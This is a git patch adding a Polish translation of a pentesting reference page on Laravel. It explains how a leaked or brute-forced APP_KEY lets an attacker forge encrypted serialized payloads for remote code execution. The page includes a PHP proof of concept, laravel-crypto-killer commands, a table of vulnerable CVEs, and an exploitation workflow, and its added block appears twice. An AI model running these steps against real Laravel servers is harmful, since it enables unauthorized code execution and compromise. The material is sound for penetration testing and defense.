From 783d2ccc9833e906efebf372c1dc453ee172ea0e Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 10 Jul 2025 12:38:40 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/pentesting-web/laravel.md'] --- .../pentesting-web/laravel.md | 179 +++++++++++++++++- 1 file changed, 173 insertions(+), 6 deletions(-) diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md index 4d569d638..664d0c370 100644 --- a/src/network-services-pentesting/pentesting-web/laravel.md +++ b/src/network-services-pentesting/pentesting-web/laravel.md @@ -1,9 +1,94 @@ # Laravel +{{#include /banners/hacktricks-training.md}} + +### Laravel SQLInjection + +Przeczytaj informacje na ten temat tutaj: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) + +--- + +## APP_KEY & Wnętrza szyfrowania (Laravel \u003e=5.6) + +Laravel używa AES-256-CBC (lub GCM) z integralnością HMAC w tle (`Illuminate\\Encryption\\Encrypter`). +Surowy tekst szyfrowany, który ostatecznie **jest wysyłany do klienta**, to **Base64 obiektu JSON** takiego jak: +```json +{ +"iv" : "Base64(random 16-byte IV)", +"value": "Base64(ciphertext)", +"mac" : "HMAC_SHA256(iv||value, APP_KEY)", +"tag" : "" // only used for AEAD ciphers (GCM) +} +``` +`encrypt($value, $serialize=true)` domyślnie `serialize()` tekst jawny, podczas gdy `decrypt($payload, $unserialize=true)` **automatycznie `unserialize()`** odszyfrowaną wartość. Dlatego **każdy atakujący, który zna 32-bajtowy sekret `APP_KEY`, może stworzyć zaszyfrowany obiekt PHP zserializowany i uzyskać RCE za pomocą metod magicznych (`__wakeup`, `__destruct`, …)**. + +Minimalne PoC (framework ≥9.x): +```php +use Illuminate\Support\Facades\Crypt; + +$chain = base64_decode(''); // e.g. phpggc Laravel/RCE13 system id -b -f +$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste +``` +Wstrzyknij wygenerowany ciąg do dowolnego podatnego `decrypt()` sinka (parametr trasy, cookie, sesja, …). + +--- + +## laravel-crypto-killer 🧨 +[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automatyzuje cały proces i dodaje wygodny tryb **bruteforce**: +```bash +# Encrypt a phpggc chain with a known APP_KEY +laravel_crypto_killer.py encrypt -k "base64:" -v "$(phpggc Laravel/RCE13 system id -b -f)" + +# Decrypt a captured cookie / token +laravel_crypto_killer.py decrypt -k -v + +# Try a word-list of keys against a token (offline) +laravel_crypto_killer.py bruteforce -v -kf appkeys.txt +``` +Skrypt transparentnie obsługuje zarówno ładunki CBC, jak i GCM oraz regeneruje pole HMAC/tag. + +--- + +## Wzorce podatności w rzeczywistym świecie + +| Projekt | Podatny punkt | Łańcuch gadżetów | +|---------|-----------------|--------------| +| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 | +| Snipe-IT ≤v6 (CVE-2024-48987) | Ciasteczko `XSRF-TOKEN`, gdy `Passport::withCookieSerialization()` jest włączone | Laravel/RCE9 | +| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → ciasteczko `laravel_session` | Laravel/RCE15 | + +Workflow eksploatacji zawsze wygląda następująco: +1. Uzyskaj `APP_KEY` (domyślne przykłady, wyciek z Git, wyciek config/.env lub brute-force) +2. Wygeneruj gadżet za pomocą **PHPGGC** +3. `laravel_crypto_killer.py encrypt …` +4. Dostarcz ładunek przez podatny parametr/ciasteczko → **RCE** + +--- + +## Masowe odkrywanie APP_KEY za pomocą brute-force ciasteczek + +Ponieważ każda nowa odpowiedź Laravel ustawia przynajmniej 1 zaszyfrowane ciasteczko (`XSRF-TOKEN` i zazwyczaj `laravel_session`), **publiczne skanery internetowe (Shodan, Censys, …) ujawniają miliony szyfrogramów**, które można atakować offline. + +Kluczowe ustalenia badań opublikowanych przez Synacktiv (2024-2025): +* Zbiór danych lipiec 2024 » 580 k tokenów, **3,99 % kluczy złamanych** (≈23 k) +* Zbiór danych maj 2025 » 625 k tokenów, **3,56 % kluczy złamanych** +* >1 000 serwerów nadal podatnych na legacy CVE-2018-15133, ponieważ tokeny bezpośrednio zawierają zserializowane dane. +* Ogromne ponowne użycie kluczy – Top-10 APP_KEYów to domyślne wartości zakodowane w komercyjnych szablonach Laravel (UltimatePOS, Invoice Ninja, XPanel, …). + +Prywatne narzędzie Go **nounours** zwiększa wydajność brute-force AES-CBC/GCM do ~1,5 miliarda prób/s, redukując łamanie pełnego zbioru danych do <2 minut. + +--- + +## Odniesienia +* [Laravel: analiza wycieku APP_KEY](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) +* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) +* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc) +* [CVE-2018-15133 opis (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce) + {{#include ../../banners/hacktricks-training.md}} -## Laravel Tricks +## Sztuczki Laravel ### Tryb debugowania @@ -12,13 +97,13 @@ Na przykład `http://127.0.0.1:8000/profiles`: ![](<../../images/image (1046).png>) -Jest to zazwyczaj potrzebne do wykorzystania innych CVE RCE Laravel. +Jest to zazwyczaj potrzebne do eksploatacji innych CVE RCE Laravel. ### .env -Laravel zapisuje APP, którego używa do szyfrowania ciasteczek i innych poświadczeń w pliku o nazwie `.env`, który można uzyskać za pomocą pewnego przejścia ścieżki pod: `/../.env` +Laravel zapisuje APP, którego używa do szyfrowania ciasteczek i innych poświadczeń w pliku o nazwie `.env`, do którego można uzyskać dostęp za pomocą pewnego przejścia ścieżki pod: `/../.env` -Laravel pokaże również te informacje na stronie debugowania (która pojawia się, gdy Laravel napotyka błąd i jest aktywna). +Laravel pokaże również te informacje na stronie debugowania (która pojawia się, gdy Laravel napotyka błąd i jest aktywowana). Używając tajnego APP_KEY Laravel, możesz odszyfrować i ponownie zaszyfrować ciasteczka: @@ -87,8 +172,8 @@ Wersje podatne: 5.5.40 oraz 5.6.x do 5.6.29 ([https://www.cvedetails.com/cve/CVE Tutaj możesz znaleźć informacje o podatności na deserializację: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/) -Możesz to przetestować i wykorzystać, używając [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\ -Lub możesz również to wykorzystać z metasploit: `use unix/http/laravel_token_unserialize_exec` +Możesz to przetestować i wykorzystać używając [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\ +Lub możesz również wykorzystać to z metasploit: `use unix/http/laravel_token_unserialize_exec` ### CVE-2021-3129 @@ -98,5 +183,87 @@ Inna deserializacja: [https://github.com/ambionics/laravel-exploits](https://git Przeczytaj informacje o tym tutaj: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) +### Laravel SQLInjection + +Przeczytaj informacje o tym tutaj: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel) + +--- + +## APP_KEY & Wnętrza szyfrowania (Laravel \u003e=5.6) + +Laravel używa AES-256-CBC (lub GCM) z integralnością HMAC w tle (`Illuminate\\Encryption\\Encrypter`). +Surowy szyfrogram, który ostatecznie **jest wysyłany do klienta**, to **Base64 obiektu JSON** jak: +```json +{ +"iv" : "Base64(random 16-byte IV)", +"value": "Base64(ciphertext)", +"mac" : "HMAC_SHA256(iv||value, APP_KEY)", +"tag" : "" // only used for AEAD ciphers (GCM) +} +``` +`encrypt($value, $serialize=true)` domyślnie `serialize()` tekst jawny, podczas gdy `decrypt($payload, $unserialize=true)` **automatycznie `unserialize()`** odszyfrowaną wartość. Dlatego **każdy atakujący, który zna 32-bajtowy sekret `APP_KEY`, może stworzyć zaszyfrowany obiekt PHP zserializowany i uzyskać RCE za pomocą metod magicznych (`__wakeup`, `__destruct`, …)**. + +Minimalne PoC (framework ≥9.x): +```php +use Illuminate\Support\Facades\Crypt; + +$chain = base64_decode(''); // e.g. phpggc Laravel/RCE13 system id -b -f +$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste +``` +Wstrzyknij wygenerowany ciąg do dowolnego podatnego `decrypt()` sinka (parametr trasy, cookie, sesja, …). + +--- + +## laravel-crypto-killer 🧨 +[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automatyzuje cały proces i dodaje wygodny tryb **bruteforce**: +```bash +# Encrypt a phpggc chain with a known APP_KEY +laravel_crypto_killer.py encrypt -k "base64:" -v "$(phpggc Laravel/RCE13 system id -b -f)" + +# Decrypt a captured cookie / token +laravel_crypto_killer.py decrypt -k -v + +# Try a word-list of keys against a token (offline) +laravel_crypto_killer.py bruteforce -v -kf appkeys.txt +``` +Skrypt transparentnie obsługuje zarówno ładunki CBC, jak i GCM oraz regeneruje pole HMAC/tag. + +--- + +## Wzorce podatności w rzeczywistym świecie + +| Projekt | Podatny punkt | Łańcuch gadżetów | +|---------|-----------------|--------------| +| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 | +| Snipe-IT ≤v6 (CVE-2024-48987) | Ciasteczko `XSRF-TOKEN`, gdy `Passport::withCookieSerialization()` jest włączone | Laravel/RCE9 | +| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → ciasteczko `laravel_session` | Laravel/RCE15 | + +Workflow eksploatacji zawsze wygląda następująco: +1. Uzyskaj `APP_KEY` (domyślne przykłady, wyciek z Git, wyciek config/.env lub brute-force) +2. Wygeneruj gadżet za pomocą **PHPGGC** +3. `laravel_crypto_killer.py encrypt …` +4. Dostarcz ładunek przez podatny parametr/ciasteczko → **RCE** + +--- + +## Masowe odkrywanie APP_KEY za pomocą brute-force ciasteczek + +Ponieważ każda nowa odpowiedź Laravel ustawia co najmniej 1 zaszyfrowane ciasteczko (`XSRF-TOKEN` i zazwyczaj `laravel_session`), **publiczne skanery internetowe (Shodan, Censys, …) ujawniają miliony szyfrogramów**, które można atakować offline. + +Kluczowe ustalenia badań opublikowanych przez Synacktiv (2024-2025): +* Zbiór danych lipiec 2024 » 580 k tokenów, **3,99 % kluczy złamanych** (≈23 k) +* Zbiór danych maj 2025 » 625 k tokenów, **3,56 % kluczy złamanych** +* >1 000 serwerów nadal podatnych na przestarzałe CVE-2018-15133, ponieważ tokeny bezpośrednio zawierają zserializowane dane. +* Ogromne ponowne użycie kluczy – 10 najlepszych APP_KEYów to domyślne wartości zakodowane w komercyjnych szablonach Laravel (UltimatePOS, Invoice Ninja, XPanel, …). + +Prywatne narzędzie Go **nounours** zwiększa wydajność brute-force AES-CBC/GCM do ~1,5 miliarda prób/s, redukując łamanie pełnego zbioru danych do <2 minut. + +--- + +## Odnośniki +* [Laravel: analiza wycieku APP_KEY](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html) +* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) +* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc) +* [CVE-2018-15133 opis (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce) {{#include ../../banners/hacktricks-training.md}}